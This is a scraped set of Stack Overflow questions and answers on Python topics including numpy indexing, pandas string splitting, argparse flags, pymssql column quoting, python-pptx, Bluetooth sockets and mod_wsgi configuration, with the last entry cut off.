<p>One way would be with <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.meshgrid.html" rel="nofollow"><code>np.meshgrid</code></a> to create <code>2D</code> indexing meshes corresponding to the window of <code>(n,n)</code> shape, adding those with <code>i0</code> that's extended with two new axes along which broadcasting would take place. Finally, we simply index into <code>C</code> to give us the desired <code>4D</code> output. Thus, one implementation would be like so -</p> <pre><code>N = np.arange(n) X,Y = np.meshgrid(N,N) out = C[i0[...,None,None] + Y,i0[...,None,None] + X] </code></pre> <p>Sample run -</p> <pre><code>In [153]: C Out[153]: array([[3, 5, 1, 6, 3, 5, 8, 7, 0, 2], [8, 4, 6, 8, 7, 2, 6, 2, 5, 0], [3, 7, 7, 7, 3, 4, 4, 6, 7, 6], [7, 0, 8, 2, 1, 1, 0, 4, 4, 6], [2, 4, 6, 0, 0, 5, 6, 8, 0, 0], [4, 6, 1, 0, 5, 6, 2, 1, 7, 4], [0, 5, 5, 3, 7, 5, 7, 1, 4, 0], [6, 4, 4, 7, 2, 4, 6, 6, 6, 5], [5, 2, 3, 2, 2, 5, 4, 5, 2, 5], [3, 7, 1, 0, 4, 4, 6, 6, 2, 2]]) In [154]: i0 Out[154]: array([[1, 0, 4, 4], [0, 4, 4, 0], [2, 3, 1, 3], [2, 2, 0, 4]]) In [155]: n = 3 In [157]: out[0,0,:,:] Out[157]: array([[4, 6, 8], [7, 7, 7], [0, 8, 2]]) In [158]: C[i0[0,0]:i0[0,0]+n,i0[0,0]:i0[0,0]+n] Out[158]: array([[4, 6, 8], [7, 7, 7], [0, 8, 2]]) </code></pre>
1
2016-07-21T08:32:09Z
[ "python", "arrays", "numpy" ]
Data Mining: Clustering of nominal attributes through DBSCAN algo
38,498,686
<p>I want to perform clustering on a data set with DBSCAN algorithm. The problem is that the data has nominal attributes like zipcode and currency. Any idea how to handle these values?</p>
-1
2016-07-21T08:16:32Z
38,520,177
<p>Two options:</p> <ol> <li><p>Define a custom distance function that handles these attributes as desired. For example with zip codes, you will want to look up proximity.</p></li> <li><p>Use Generalized DBSCAN and define a custom neighbor predicate. It could require e.g. zip codes to be neighbors <em>and</em> attribute values to be similar.</p></li> </ol> <p>Don't use one-hot encoding on zip codes. That does not make much sense. You might as well use Hamming distance on the categorical attributes, which is more efficient (see option 1).</p>
0
2016-07-22T07:03:11Z
[ "python", "cluster-analysis", "data-mining" ]
execute script from within python3 interpreter and show interpreter results
38,498,690
<p>I am working inside the python 3 interpreter, and I want to use it for homework.</p> <p>first, I have a library called <code>mylibrary.py</code> like this</p> <pre><code>from math import pi def area_circle(r): return(r*r*pi)) </code></pre> <p>Second, I have a script called <code>homework.py</code> like this</p> <pre><code>from mylibrary import * area_circle(3) area_circle(5) area_circle(3) + area_circle(5) </code></pre> <p>Now, I want to enter the python interpreter and somehow execute the script <code>homework.py</code> as if I had typed these lines directly into the interpreter, and I want the results to appear on the screen as the interpreter normally displays them.</p> <p>from the BASH prompt:</p> <pre><code>$python3 Python 3.4.3 (default, Oct 14 2015, 20:28:29) [GCC 4.8.4] on linux Type "help", "copyright", "credits" or "license" for more information. &gt;&gt;&gt; exec "homework" </code></pre> <p>Is there such a command? I want it to read my script and enter the lines into the interpreter, so that what appears on the screen next is:</p> <pre><code>&gt;&gt;&gt; from mylibrary import * &gt;&gt;&gt; area_circle(3) 28.274333882308138 &gt;&gt;&gt; area_circle(5) 78.53981633974483 &gt;&gt;&gt; area_circle(3) + area_circle(5) 106.81415022205297 </code></pre> <p>Please note that I do not have <code>Idle</code>, i do not have <code>iPython</code>, I just have the interpreter which I access from the BASH prompt. </p> <p>I know that I could replace the functions in the library to explicitly call the print function, something like this:</p> <pre><code>def area_circle(r): a=r*r*pi print(a) return() </code></pre> <p>But I don't want that, as it would prevent me from using this function as a building block of future functions.<br> So I guess what I'm asking is how to execute the <code>homework</code> script line by line into the interpreter, in the simplest way possible.</p>
-1
2016-07-21T08:16:45Z
38,499,370
<p>You can"t show the content without using 'print' if you're not using python prompt .... </p> <p>You can modify your function, so it prints if a second argument is given, and doesn't print otherwise : </p> <pre><code>def area_circle(r, do_print=False): a=r*r*pi if do_print: print(a) return a </code></pre> <p>This function will return the area in all the case. It will also print its value if you give it <code>True</code> as a second argument (<code>area_circle(3)</code> prints nothing and returns the area, while <code>area_circle(3,True)</code> print the area, and also returns its value)</p>
0
2016-07-21T08:48:11Z
[ "python", "python-3.x", "exec", "interpreter" ]
Split pandas column and add last element to a new column
38,498,718
<p>I have a pandas dataframe containing (besides other columns) full names:</p> <pre><code> fullname martin master andreas test </code></pre> <p>I want to create a new column which splits the fullname column along the blank space and assigns the last element to a new column. The result should look like:</p> <pre><code> fullname lastname martin master master andreas test test </code></pre> <p>I thought it would work like this:</p> <pre><code>df['lastname'] = df['fullname'].str.split(' ')[-1] </code></pre> <p>However, I get a <code>KeyError: -1</code></p> <p>I use <code>[-1]</code>, that is the last element of the split group, in order to be sure that I get the real last name. In some cases (e.g. a name like <em>andreas martin master</em>), this helps to get the last name, that is, <em>master</em>.</p> <p>So how can I do this?</p>
3
2016-07-21T08:18:14Z
38,498,755
<p>You need another <code>str</code> to access the last splits for every row, what you did was essentially try to index the series using a non-existent label:</p> <pre><code>In [31]: df['lastname'] = df['fullname'].str.split().str[-1] df Out[31]: fullname lastname 0 martin master master 1 andreas test test </code></pre>
4
2016-07-21T08:19:40Z
[ "python", "pandas", "split" ]
Split pandas column and add last element to a new column
38,498,718
<p>I have a pandas dataframe containing (besides other columns) full names:</p> <pre><code> fullname martin master andreas test </code></pre> <p>I want to create a new column which splits the fullname column along the blank space and assigns the last element to a new column. The result should look like:</p> <pre><code> fullname lastname martin master master andreas test test </code></pre> <p>I thought it would work like this:</p> <pre><code>df['lastname'] = df['fullname'].str.split(' ')[-1] </code></pre> <p>However, I get a <code>KeyError: -1</code></p> <p>I use <code>[-1]</code>, that is the last element of the split group, in order to be sure that I get the real last name. In some cases (e.g. a name like <em>andreas martin master</em>), this helps to get the last name, that is, <em>master</em>.</p> <p>So how can I do this?</p>
3
2016-07-21T08:18:14Z
38,499,006
<p>If need create 2 new columns, use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.str.rsplit.html" rel="nofollow"><code>str.rsplit</code></a> with parameter <code>n=1</code>. If need only last column, <a href="http://stackoverflow.com/a/38498755/2901002"><code>EdChum</code></a> solution is better:</p> <pre><code>print (df) fullname 0 martin master 1 andreas test 2 andreas martin master df[['first_name','last_name']] = df['fullname'].str.rsplit(expand=True, n=1) print (df) fullname first_name last_name 0 martin master martin master 1 andreas test andreas test 2 andreas martin master andreas martin master </code></pre>
1
2016-07-21T08:30:55Z
[ "python", "pandas", "split" ]
read_sql_query returns far more records than actual table rows
38,498,960
<p>I am trying to get the a postgresql table in to python data frame. But the dataframe size is extremely larger than the actual number of table records even though I specified an index column. What's causing this issue? Single quotes/ commas in the database table?</p> <pre><code>import psycopg2 as pg import pandas.io.sql as psql connection = pg.connect("dbname=BeaconDB user=admin password=root") dataframe = psql.read_sql_query(sql="SELECT * from encounters2", con=connection, index_col='encounter_id') print('size::::', dataframe.size) </code></pre>
0
2016-07-21T08:29:11Z
38,499,155
<p><a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.size.html" rel="nofollow">df.size</a> shows you the number of elements (cells) in the DF</p> <p>Demo:</p> <pre><code>In [134]: df Out[134]: A B 0 3 11 1 0 2 In [135]: df.size Out[135]: 4 In [136]: df.shape Out[136]: (2, 2) In [137]: len(df) Out[137]: 2 In [138]: len(df.index) Out[138]: 2 </code></pre>
0
2016-07-21T08:37:41Z
[ "python", "postgresql", "pandas" ]
Matplotlib custom style error
38,498,981
<p>I am trying to set the plotting style in matplotlib:</p> <blockquote> <p>import pandas as pd</p> <p>import matplotlib</p> <p>print matplotlib.<strong>version</strong></p> <p>matplotlib.style.use('ggplot')</p> </blockquote> <p>Output:</p> <blockquote> <p>1.5.1</p> <p>AttributeError: 'module' object has no attribute 'style'</p> </blockquote> <p>So the version of my matplotlib is > 1.4 but style still doesnt work. I did confirm that the style folder is in <code>site-packages</code>.</p> <p>Any help would be appreciated. Thanks</p>
0
2016-07-21T08:23:59Z
38,499,121
<p>Try this:</p> <pre><code>%matplotlib inline import pandas as pd import matplotlib print matplotlib.version matplotlib.style.use('ggplot') </code></pre>
0
2016-07-21T08:36:16Z
[ "python" ]
--debug command line argument in Python
38,499,158
<p>When I introduce to the command line "--debug" argument I need to set variable "debug", from my python script, to the value 1.</p> <p>I've tried something, but I have to write "--debug=1" to the command line to set variable.</p> <pre><code>parser = argparse.ArgumentParser() parser.add_argument("--debug", default=2) </code></pre> <p>When I run the command:</p> <pre><code>python script.py --rev1=1.2 --rev2=1.5 --debug </code></pre> <p>my variable "debug" should have value 1.</p>
0
2016-07-21T08:37:47Z
38,499,244
<p>If you're interested to know whether a certain command line flag has been passed to your script, you'd set the <a href="https://docs.python.org/3/library/argparse.html#action" rel="nofollow"><code>action</code></a> argument of <code>Argument.add_argument</code> to <code>store_true</code>.</p> <pre><code>parser.add_argument('--debug', action='store_true') </code></pre> <p>Then <code>parser.parse_args().debug</code> will have the value of <code>True</code> if <code>--debug</code> was present and <code>False</code> otherwise.</p> <pre><code>$ python script.py parser.parse_args() returned Namespace(debug=False) $ python script.py --debug parser.parse_args() returned Namespace(debug=True) </code></pre>
0
2016-07-21T08:42:13Z
[ "python", "command", "argparse" ]
Best way to prevent sql "injection" when using column as variable
38,499,201
<p>I'm using pymssql to Update, Drop, and Add columns to a MS SQL server. the columns are sadly variables set by external sources such as reading the database, reading from another database. Now i'm trying to prevent "bad" sql to get through as i don't know exactly what the other database gives me. </p> <pre><code>'ALTER TABLE tablenameA ADD [' + columnname + '] varchar(25) NULL' 'ALTER TABLE tablenameA DROP COLUMN ['+columnname+']' ('UPDATE tablenameA SET [' + columnname + ']=%s WHERE id = 2', value) </code></pre> <p>Now i can't use a whitelist as i don't know what column names is to be added, my only other option i can think of is to use a blacklist, but i was wondering if there maybe exists a third option. </p> <p>(The column names are gotten from a column in a table with type string)</p>
0
2016-07-21T08:40:13Z
38,499,740
<p>Transact-SQL has a function to turn a SQL string into a safe object name: <a href="https://msdn.microsoft.com/en-us/library/ms176114.aspx" rel="nofollow"><code>QUOTENAME()</code></a>. Use it around a bind parameter to have the database driver provide a properly quoted SQL object:</p> <pre><code>cursor.execute('SELECT QUOTENAME(%s)', (columnname,)) quoted_columnname, = next(cursor) </code></pre> <p>Now you can use <em>that</em> string in a new query:</p> <pre><code>query = 'ALTER TABLE tablenameA ADD {} varchar(25) NULL'.format(quoted_columnname) </code></pre> <p>etc. I used <code>str.format()</code> to insert the string here, rather than use string concatenation. Note that the <code>[...]</code> square brackets are no longer needed; <code>QUOTENAME()</code> took care of that.</p>
1
2016-07-21T09:06:55Z
[ "python", "sql-server", "sql-injection", "pymssql" ]
How to block and wait for async, callback based Python function calls
38,499,261
<p>I have a Python script makes many async requests. The API I'm using takes a callback.</p> <p>The main function calls run and I want it to block execution until all the requests have come back.</p> <p>What could I use within Python 2.7 to achieve this?</p> <pre><code>def run(): for request in requests: client.send_request(request, callback) def callback(error, response): # handle response pass def main(): run() # I want to block here </code></pre> <p>Thanks!</p>
1
2016-07-21T08:42:55Z
38,502,488
<p>I found that the simplest, least invasive way is to use <code>threading.Event</code>, available in 2.7.</p> <pre><code>import threading import functools def run(): events = [] for request in requests: event = threading.Event() callback_with_event = functools.partial(callback, event) client.send_request(request, callback_with_event) events.append(event) return events def callback(event error, response): # handle response event.set() def wait_for_events(events): for event in events: event.wait() def main(): events = run() wait_for_events(events) </code></pre>
1
2016-07-21T11:01:32Z
[ "python", "asynchronous", "callback" ]
How can I pull information from Excel into PowerPoint using Python and keep the format?
38,499,294
<p>I've written a script with python's xlrd and pptx to read each workbook in a directory and pull information from each sheet into a table in a PowerPoint slide. It works okay if the excel table is small but I don't know what will be in these excel files. It becomes illegible when there is too many rows and columns. My main problem arose when an excel file had graphs instead of cells and the script couldn't read it. So I tried using pyscreenshot to open the document and take a screenshot but this seems slow and unnecessary. I'd like to make a slide in the PowerPoint look exactly as it would in excel but with the ability to add and change things. </p> <pre><code>import libraries and modules import xlrd from pptx import Presentation from pptx.util import Inches, Pt import time import glob import os start = time.time() prs = Presentation() title_slide_layout = prs.slide_layouts[0] slide = prs.slides.add_slide(title_slide_layout) shapes = slide.shapes title = slide.shapes.title subtitle = slide.placeholders[1] title.text = "Dashboard Generator" subtitle.text = "made with Python-pptx and xlrd" for filename in glob.glob(os.path.join("C:/Users/penelope/Desktop/PMO/myfiles/", '*.xlsx')): print(filename) file_location = filename try: workbook = xlrd.open_workbook(file_location) nsheets = workbook.nsheets for n in range(0, nsheets): sheet = workbook.sheet_by_index(n) print("sheet:", sheet) rows = sheet.nrows cols = sheet.ncols c = cols r = rows if c &gt; 0: print(c, r) slide = prs.slides.add_slide(prs.slide_layouts[5]) shapes = slide.shapes title = slide.shapes.title title.text = "Table testing" left = Inches(0.0) top = Inches(2.0) width = Inches(6.0) height = Inches(4.0) num = 10.0/c table = shapes.add_table(rows, cols, left, top, width, height).table for i in range(0, c): table.columns[i].width = Inches(num) for i in range(0,r): for e in range(0,c): table.cell(i,e).text = str(sheet.cell_value(i,e)) cell = table.rows[i].cells[e] paragraph = cell.text_frame.paragraphs[0] paragraph.font.size = Pt(11) except: print("Error!") pass prs.save('powerpointfile1.pptx') end = time.time() print(end - start) </code></pre> <p>And this is my screenshot script:</p> <pre><code>import os import time import pyscreenshot as ImageGrab from PIL import Image if __name__ == "__main__": os.system('start excel.exe "C:/Users/penelope/Desktop/PMO/TestCase.xlsx"') time.sleep(3) im=ImageGrab.grab(bbox=(24,210,1800,990)) im.save("image7.png") img = Image.open('image7.png') img.show() </code></pre>
0
2016-07-21T08:44:35Z
38,515,889
<p>Well, you've chosen a hard problem. Certainly all the times I've attempted this sort of thing I've ended up abandoning the effort.</p> <p>The fundamental explanation I formed was that Excel (and Word) are "flowed" document environments. That is, when you run out of room on one page, it flows to the next. PowerPoint, on the other hand, is a page-by-page exhibit layout environment. Each slide is independent of the rest (evidenced by the ability to reorder slides freely), each meant to be shown all at once, and not scrolled. This leads to each slide being self-contained, which means constrained to a single "page".</p> <p>There's a limit to how much information one can place on a slide and still have it communicate. Generally less is better. So, perhaps it's not a surprise all my early efforts there ended in frustration :) I also concluded that an effective "dashboard" slide would require very skillful layout, and extreme restraint on content length, probably requiring specific (human) summarization effort (not just copying from a "database").</p> <p>Regarding the charts bit, those theoretically can be moved to PowerPoint and I've even seen it done, but it's technically quite challenging. There is no API support for it in python-pptx. <a href="https://github.com/scanny/python-pptx/pull/65" rel="nofollow">This historical issue on the GitHub repo</a> may give some idea what was involved. Not for the faint of heart I expect :)</p>
0
2016-07-21T23:21:22Z
[ "python", "excel", "powerpoint" ]
python Bluetooth error - No module named _bluetooth
38,499,342
<p>I am trying an example code in python which works as a bluetooth server. This code gives following error..</p> <p>Traceback (most recent call last): File "/var/lib/cloud9/examples/Sa/rfcomm-server_py", line 7, in from bluetooth import * File "/var/lib/cloud9/examples/Sa/bluetooth/<strong>init</strong>.py", line 43, in from .bluez import * File "/var/lib/cloud9/examples/Sa/bluetooth/bluez.py", line 6, in import _bluetooth as _bt ImportError: No module named _bluetooth</p> <p>I am using beaglebone green wireless board in cloud9 IDE</p> <pre><code> # file: rfcomm-server.py # auth: Albert Huang &lt;albert@csail.mit.edu&gt; # desc: simple demonstration of a server application that uses RFCOMM sockets # $Id: rfcomm-server.py 518 2007-08-10 07:20:07Z albert $ from bluetooth import * server_sock=BluetoothSocket( RFCOMM ) server_sock.bind(("",PORT_ANY)) server_sock.listen(1) port = server_sock.getsockname()[1] uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee" advertise_service( server_sock, "SampleServer", service_id = uuid, service_classes = [ uuid, SERIAL_PORT_CLASS ], profiles = [ SERIAL_PORT_PROFILE ], # protocols = [ OBEX_UUID ] ) print("Waiting for connection on RFCOMM channel %d" % port) client_sock, client_info = server_sock.accept() print("Accepted connection from ", client_info) try: while True: data = client_sock.recv(1024) if len(data) == 0: break print("received [%s]" % data) except IOError: pass print("disconnected") client_sock.close() server_sock.close() print("all done") </code></pre>
0
2016-07-21T08:47:14Z
38,501,457
<p>I didn't turn on the bluetooth on Beaglebone green wireless board, but after running the following command, the code above worked perfectly:</p> <pre><code>$ bb-wl18xx-bluetooth </code></pre>
0
2016-07-21T10:17:10Z
[ "python", "bluetooth", "cloud9-ide", "beagleboard" ]
How to display a binary state (ON/OFF) in Matplotlib?
38,499,347
<p>I have built a GUI with matplotlib and it contains several plots of values versus time. Now I need a special plot which just shows if a value is on or off (binary state).</p> <p>Kinda like a control lamp on an analog control panel. I have 5 of those on/off values and I dont know how to do it the best way. </p> <p>The "lamps" must be updateable because I stream the data from serial and analyze it in real time in my GUI.</p> <p>I attached a picture where you see my current GUI. In the bottom right corner is now a bar chart, I tried to visualize the ON/OFF state with a bar, but it didn't work well and I wasn't able to animate it.</p> <p><a href="http://i.stack.imgur.com/uFh8u.png" rel="nofollow"><img src="http://i.stack.imgur.com/uFh8u.png" alt="enter image description here"></a></p> <p>So yeah, how could I display 5 values with each an ON/OFF state in that area?</p>
0
2016-07-21T08:47:23Z
38,500,368
<p>Instead of passing via bar charts I would directly plot a number of rectangles and then dynamically change their color.</p> <p>You can find the documentation for rectangular patches here: <a href="http://matplotlib.org/api/patches_api.html#matplotlib.patches.Rectangle" rel="nofollow">http://matplotlib.org/api/patches_api.html#matplotlib.patches.Rectangle</a></p> <p>If you need some pointers on how to animate such a patch have a look here: <a href="https://nickcharlton.net/posts/drawing-animating-shapes-matplotlib.html" rel="nofollow">https://nickcharlton.net/posts/drawing-animating-shapes-matplotlib.html</a></p>
0
2016-07-21T09:32:13Z
[ "python", "matplotlib" ]
How can Apache use Py3 instesd of Py2?
38,499,444
<p>How can Apache use Python/3.x instesd of Python/2.x ?</p> <p>I'm now trying to set up Django application on server with Py3. The command <code>python manage.py runserver</code> was successful. Then I tried to use <code>Apache</code> and <code>mod_wsgi</code> but I got <code>Internal Server Error</code>.</p> <p>The error logs said that</p> <pre><code>[mpm_prefork:notice] [pid 30732] AH00163: Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python/2.7.5 configured -- resuming normal operations </code></pre> <p>but the default python was Py3.</p> <pre><code># python -V Python 3.5.1 </code></pre> <p>I wondered the error would be fixed when apache use Py3. How about you? How can I specify Py3?</p> <h1>Start command</h1> <pre><code># /etc/init.d/httpd restart </code></pre> <h1>Full error logs</h1> <pre><code>$ tailf /etc/httpd/logs/error_log [Thu Jul 21 15:32:20.626731 2016] [auth_digest:notice] [pid 30732] AH01757: generating secret for digest authentication ... [Thu Jul 21 15:32:20.627378 2016] [lbmethod_heartbeat:notice] [pid 30732] AH02282: No slotmem from mod_heartmonitor [Thu Jul 21 15:32:20.629557 2016] [mpm_prefork:notice] [pid 30732] AH00163: Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python/2.7.5 configured -- resuming normal operations [Thu Jul 21 15:32:20.629580 2016] [core:notice] [pid 30732] AH00094: Command line: '/usr/sbin/httpd' [Thu Jul 21 15:37:31.940196 2016] [mpm_prefork:notice] [pid 30732] AH00169: caught SIGTERM, shutting down [Thu Jul 21 15:37:31.981414 2016] [suexec:notice] [pid 30777] AH01232: suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Thu Jul 21 15:37:31.993034 2016] [auth_digest:notice] [pid 30778] AH01757: generating secret for digest authentication ... [Thu Jul 21 15:37:31.993935 2016] [lbmethod_heartbeat:notice] [pid 30778] AH02282: No slotmem from mod_heartmonitor [Thu Jul 21 15:37:31.996832 2016] [mpm_prefork:notice] [pid 30778] AH00163: Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python/2.7.5 configured -- resuming normal operations [Thu Jul 21 15:37:31.996866 2016] [core:notice] [pid 30778] AH00094: Command line: '/usr/sbin/httpd' </code></pre> <h1>environment</h1> <pre><code>Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python 3.5.1 Django 1.9 CentOS 7.1 </code></pre>
1
2016-07-21T08:51:49Z
38,540,742
<p>If you're using compiled <strong>mod_wsgi</strong>, you need to compile it against the appropriate Python binary for the version you want to use, or it'll default to the system Python version (still typically 2.x, unfortunately). For example:</p> <pre><code>wget -q "https://github.com/GrahamDumpleton/mod_wsgi/archive/4.4.21.tar.gz" tar -xzf '4.4.21.tar.gz' cd ./mod_wsgi-4.4.21 ./configure --with-python=/usr/local/bin/python3.5 make make install </code></pre> <p>Good luck!</p>
0
2016-07-23T10:28:48Z
[ "python", "django", "apache", "mod-wsgi" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,499,659
<p>Here is the answer, using list comprehension</p> <pre><code>&gt;&gt;&gt; [x[:3] for x in a[:3]] [[1, 3, 2], [4, 9, 8], [7, 5, 6]] </code></pre> <p>Left section :</p> <pre><code>[x[0:3] for x in a[0:3]] [x[0:3] for x in a[3:6]] [x[0:3] for x in a[6:9]] </code></pre> <p>Middle section :</p> <pre><code>[x[3:6] for x in a[0:3]] [x[3:6] for x in a[3:6]] [x[3:6] for x in a[6:9]] </code></pre> <p>Right section :</p> <pre><code>[x[6:9] for x in a[0:3]] [x[6:9] for x in a[3:6]] [x[6:9] for x in a[6:9]] </code></pre> <p><code>a[i:j]</code> takes the line from index i to j-1 <code>x[i,j]</code> takes the element of index i to j-1 for said lines</p> <p>To create 'flattened' lists, using the input from pwnsauce's comment :</p> <p>Left section :</p> <pre><code>[x for b in [x[0:3] for x in a[0:3]] for x in b] [x for b in [x[0:3] for x in a[3:6]] for x in b] [x for b in [x[0:3] for x in a[6:9]] for x in b] </code></pre> <p>Middle section :</p> <pre><code>[x for b in [x[3:6] for x in a[0:3]] for x in b] [x for b in [x[3:6] for x in a[3:6]] for x in b] [x for b in [x[3:6] for x in a[6:9]] for x in b] </code></pre> <p>Right section :</p> <pre><code>[x for b in [x[6:9] for x in a[0:3]] for x in b] [x for b in [x[6:9] for x in a[3:6]] for x in b] [x for b in [x[6:9] for x in a[6:9]] for x in b] </code></pre>
1
2016-07-21T09:03:14Z
[ "python", "list", "numpy" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,499,913
<p>Here's a vectorized approach using <code>reshaping</code> and permuting dimensions -</p> <pre><code>a.reshape(3,3,3,3).transpose(2,0,1,3).reshape(9,3,3) </code></pre> <p>Sample run -</p> <pre><code>In [197]: a Out[197]: array([[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]]) In [198]: a.reshape(3,3,3,3).transpose(2,0,1,3).reshape(9,3,3) Out[198]: array([[[1, 3, 2], [4, 9, 8], [7, 5, 6]], [[6, 4, 3], [5, 2, 1], [9, 8, 7]], [[2, 1, 4], [3, 6, 5], [8, 7, 9]], .... </code></pre> <p>If you need to flatten each such section/window, just tweak the last reshaping, like so -</p> <pre><code>In [199]: a.reshape(3,3,3,3).transpose(2,0,1,3).reshape(9,9) Out[199]: array([[1, 3, 2, 4, 9, 8, 7, 5, 6], [6, 4, 3, 5, 2, 1, 9, 8, 7], [2, 1, 4, 3, 6, 5, 8, 7, 9], [5, 7, 9, 2, 6, 1, 3, 8, 4], [1, 5, 8, 7, 9, 3, 4, 2, 6], [9, 3, 5, 8, 1, 7, 6, 4, 2], [4, 6, 8, 3, 7, 5, 2, 1, 9], [7, 9, 2, 8, 4, 6, 5, 3, 1], [6, 8, 7, 9, 2, 4, 1, 5, 3]]) </code></pre>
3
2016-07-21T09:14:15Z
[ "python", "list", "numpy" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,500,002
<p>You can use similar this:</p> <pre><code>for i in range(0, len(a), 3): left_section = [] middle_section = [] right_section = [] left_section.append(a[i][:3]) left_section.append(a[i+1][:3]) left_section.append(a[i+2][:3]) middle_section.append(a[i][3:6]) middle_section.append(a[i+1][3:6]) middle_section.append(a[i+2][3:6]) right_section.append(a[i][3:6]) right_section.append(a[i+1][3:6]) right_section.append(a[i+2][3:6]) print(left_section) print(middle_section) print(right_section) </code></pre> <p>OR</p> <pre><code>for i in range(0, len(a), 3): left_section = [] middle_section = [] right_section = [] left_section.extend(a[i][:3]) left_section.extend(a[i+1][:3]) left_section.extend(a[i+2][:3]) middle_section.extend(a[i][3:6]) middle_section.extend(a[i+1][3:6]) middle_section.extend(a[i+2][3:6]) right_section.extend(a[i][3:6]) right_section.extend(a[i+1][3:6]) right_section.extend(a[i+2][3:6]) print(left_section) print(middle_section) print(right_section) </code></pre>
0
2016-07-21T09:17:41Z
[ "python", "list", "numpy" ]
how to retrieve every section by 3X3?
38,499,475
<p>any one know how to retrieve section from this array:</p> <pre><code>a=[[1, 3, 2, 5, 7, 9, 4, 6, 8], [4, 9, 8, 2, 6, 1, 3, 7, 5], [7, 5, 6, 3, 8, 4, 2, 1, 9], [6, 4, 3, 1, 5, 8, 7, 9, 2], [5, 2, 1, 7, 9, 3, 8, 4, 6], [9, 8, 7, 4, 2, 6, 5, 3, 1], [2, 1, 4, 9, 3, 5, 6, 8, 7], [3, 6, 5, 8, 1, 7, 9, 2, 4], [8, 7, 9, 6, 4, 2, 1, 5, 3]] </code></pre> <p>I mean that i would like to retrieve section 3X3 ,for example,the top left one is:</p> <pre><code>[[1,3,2], [4,9,8], [7,5,6]] </code></pre> <p>the sections needed to be retrieved are :</p> <h1>left section</h1> <pre><code>[[0:3,0:3]],[[3:6,0:3]],[[6:9,0:3]] </code></pre> <h1>middle section</h1> <pre><code>[[0:3,3:6]],[[3:6,3:6]],[[6:9,3:6]] </code></pre> <h1>right section</h1> <pre><code>[[0:3,6:9]],[[3:6,6:9]],[[6:9,6:9]] </code></pre> <p>How to retrieve all these sections? Is it necessary to use numpy?</p>
0
2016-07-21T08:53:18Z
38,501,887
